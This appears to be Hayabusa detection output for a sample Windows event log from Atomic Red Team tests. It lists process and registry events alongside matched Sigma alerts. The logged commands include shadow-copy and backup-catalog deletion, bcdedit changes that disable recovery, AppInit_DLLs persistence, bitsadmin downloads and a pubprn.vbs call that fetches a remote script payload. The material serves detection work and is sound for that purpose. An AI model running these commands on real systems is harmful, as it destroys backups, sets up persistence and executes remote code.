C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentControlSet Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3968 | PGUID: 747F3D96-D809-5D31-0000-00100A242B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | LID: 0x50951 | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - AppInit | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs: C:\Tools\MessageBox64.dll,C:\Tools\MessageBox32.dll | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,New DLL Added to AppInit_DLLs Registry Key,,../hayabusa-rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Windows Load | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D809-5D31-0000-001072292B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D80C-5D31-0000-0010223C2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe delete shadows /all /quiet | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | LID: 0x50951 | PID: 1124 | PGUID: 747F3D96-D80C-5D31-0000-0010843F2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1348 | PGUID: 747F3D96-D80C-5D31-0000-001005542B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4500 | PGUID: 747F3D96-D811-5D31-0000-001000632B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wbadmin.exe delete catalog -quiet | Process: C:\Windows\System32\wbadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | LID: 0x50951 | PID: 6160 | PGUID: 747F3D96-D811-5D31-0000-001061652B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wbengine.exe"" | Process: C:\Windows\System32\wbengine.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\vds.exe | Process: C:\Windows\System32\vds.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3184 | PGUID: 747F3D96-D811-5D31-0000-0010147C2B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2948 | PGUID: 747F3D96-D812-5D31-0000-0010AC892B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:46.302 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\wbengine.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00 | Hash: SHA1=BE65E71FC691867FFA1D3129CEAB67A0688A08CB,MD5=9A0C13D674AB2D72193653EF38D8FB8E,SHA256=15817A5CB717D4846AE753A27CD8859BCE63004143083027FA5EC9324DFC5188,IMPHASH=5694D579C32F1A7EB5FA54148C174C38",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-D817-5D31-0000-001064AD2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D817-5D31-0000-001097B02B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6216 | PGUID: 747F3D96-D817-5D31-0000-001049B42B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} recoveryenabled no | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D817-5D31-0000-0010B7B62B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D817-5D31-0000-0010C8BA2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1632 | PGUID: 747F3D96-D81D-5D31-0000-0010B8CA2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7080 | PGUID: 747F3D96-D81D-5D31-0000-0010D7CD2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6736 | PGUID: 747F3D96-D824-5D31-0000-001023F42B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 1540 | PGUID: 747F3D96-D824-5D31-0000-001075F62B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5808 | PGUID: 747F3D96-D825-5D31-0000-0010CF222C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D83E-5D31-0000-0010F0D02E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /create AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | LID: 0x50951 | PID: 4508 | PGUID: 747F3D96-D83E-5D31-0000-001042D32E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D83E-5D31-0000-0010A2D72E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3732 | PGUID: 747F3D96-D83E-5D31-0000-0010AAD92E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D83E-5D31-0000-001088DE2E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3204 | PGUID: 747F3D96-D83E-5D31-0000-0010DAE02E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4332 | PGUID: 747F3D96-D83E-5D31-0000-001046E52E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /complete AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | LID: 0x50951 | PID: 388 | PGUID: 747F3D96-D83F-5D31-0000-0010A2E72E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D83F-5D31-0000-001001EC2E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /resume AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D83F-5D31-0000-001053EE2E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4888 | PGUID: 747F3D96-D83F-5D31-0000-00105EF22E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D844-5D31-0000-001075082F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | LID: 0x50951 | PID: 2484 | PGUID: 